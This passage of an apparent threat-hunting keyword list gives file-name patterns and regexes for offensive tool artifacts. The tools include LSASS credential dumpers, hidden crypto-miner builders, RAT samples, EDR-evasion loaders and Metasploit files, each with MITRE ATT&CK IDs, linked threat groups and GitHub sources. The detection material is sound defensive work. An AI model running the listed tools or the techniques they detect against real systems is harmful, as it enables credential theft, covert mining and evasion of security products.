"*\mine_karlsen.bat*",".{0,1000}\\mine_karlsen\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16610"
"*\mine_nexa.bat*",".{0,1000}\\mine_nexa\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16611"
"*\mine_nexa_with_oc.bat*",".{0,1000}\\mine_nexa_with_oc\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16612"
"*\mine_pyrin.bat*",".{0,1000}\\mine_pyrin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16613"
"*\mine_radiant.bat*",".{0,1000}\\mine_radiant\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16614"
"*\mine_rth.bat*",".{0,1000}\\mine_rth\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16615"
"*\mine_ubq.bat*",".{0,1000}\\mine_ubq\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16616"
"*\mine_zcl.bat*",".{0,1000}\\mine_zcl\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16617"
"*\MineDownloader.vbs*",".{0,1000}\\MineDownloader\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16618"
"*\MinerETH.cs*",".{0,1000}\\MinerETH\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","16619"
"*\MinerXMR.cs*",".{0,1000}\\MinerXMR\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","16620"
"*\Minidump.exe c:\*",".{0,1000}\\Minidump\.exe\sc\:\\.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16628"
"*\Minidump.exe"" c:\*",".{0,1000}\\Minidump\.exe\""\sc\:\\.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16629"
"*\MiniDump.ps1*",".{0,1000}\\MiniDump\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","16630"
"*\MiniDump-main*",".{0,1000}\\MiniDump\-main.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16631"
"*\minidump-rs.exe*",".{0,1000}\\minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16632"
"*\MiniDumpToMem.cs*",".{0,1000}\\MiniDumpToMem\.cs.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16633"
"*\mipsel_agent*",".{0,1000}\\mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","16634"
"*\MirrorDump.csproj*",".{0,1000}\\MirrorDump\.csproj.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16635"
"*\MirrorDump.exe*",".{0,1000}\\MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16636"
"*\MirrorDump.sln*",".{0,1000}\\MirrorDump\.sln.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16637"
"*\MirrorDump\MinHook*",".{0,1000}\\MirrorDump\\MinHook.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16638"
"*\MirrorDump\MiniDump\*",".{0,1000}\\MirrorDump\\MiniDump\\.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16639"
"*\MirrorDump-master*",".{0,1000}\\MirrorDump\-master.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16640"
"*\MiTM.java*",".{0,1000}\\MiTM\.java.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","16641"
"*\MITMRecorder.py*",".{0,1000}\\MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","16642"
"*\MLRatClient.exe*",".{0,1000}\\MLRatClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16644"
"*\mobaxterm.py*",".{0,1000}\\mobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16647"
"*\Mockingjay_BOF.*",".{0,1000}\\Mockingjay_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","16648"
"*\modifiableautorun.o*",".{0,1000}\\modifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","16649"
"*\Module_Stomping.py*",".{0,1000}\\Module_Stomping\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","16650"
"*\Modules\Backdoor.cs*",".{0,1000}\\Modules\\Backdoor\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","16651"
"*\monkey.exe *",".{0,1000}\\monkey\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16652"
"*\monkey32.exe*",".{0,1000}\\monkey32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16653"
"*\monkey64.exe*",".{0,1000}\\monkey64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16654"
"*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","16655"
"*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16656"
"*\Morocco-RAT *.exe*",".{0,1000}\\Morocco\-RAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16657"
"*\mortar\Lib\shell_loader.pas*",".{0,1000}\\mortar\\Lib\\shell_loader\.pas.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","16658"
"*\mortar-loader.html*",".{0,1000}\\mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","16659"
"*\MostPopularPasswords.txt*",".{0,1000}\\MostPopularPasswords\.txt.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16660"
"*\Mouse Overheat.exe*",".{0,1000}\\Mouse\sOverheat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16661"
"*\mouselogger.py*",".{0,1000}\\mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16662"
"*\MoveMouse.exe*",".{0,1000}\\MoveMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16663"
"*\mqtt_check.py*",".{0,1000}\\mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16664"
"*\mremoteng.py*",".{0,1000}\\mremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16667"
"*\mremoteng-decrypt\*",".{0,1000}\\mremoteng\-decrypt\\.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","16668"
"*\ms17-010.py*",".{0,1000}\\ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16669"
"*\msfdb.bat.erb*",".{0,1000}\\msfdb\.bat\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16670"
"*\msfnonstaged.exe*",".{0,1000}\\msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16671"
"*\msfremove.ps1*",".{0,1000}\\msfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16672"
"*\MSFRottenPotato.cpp*",".{0,1000}\\MSFRottenPotato\.cpp.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16673"
"*\MSFRottenPotato.h*",".{0,1000}\\MSFRottenPotato\.h.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","16674"
"*\MSFRottenPotato.log*",".{0,1000}\\MSFRottenPotato\.log.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16675"
"*\MSFRottenPotato.sln*",".{0,1000}\\MSFRottenPotato\.sln.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16676"
"*\MSFRottenPotatoTestHarness.*",".{0,1000}\\MSFRottenPotatoTestHarness\..{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16677"
"*\msfstaged.exe*",".{0,1000}\\msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16678"
"*\msfupdate.bat*",".{0,1000}\\msfupdate\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black 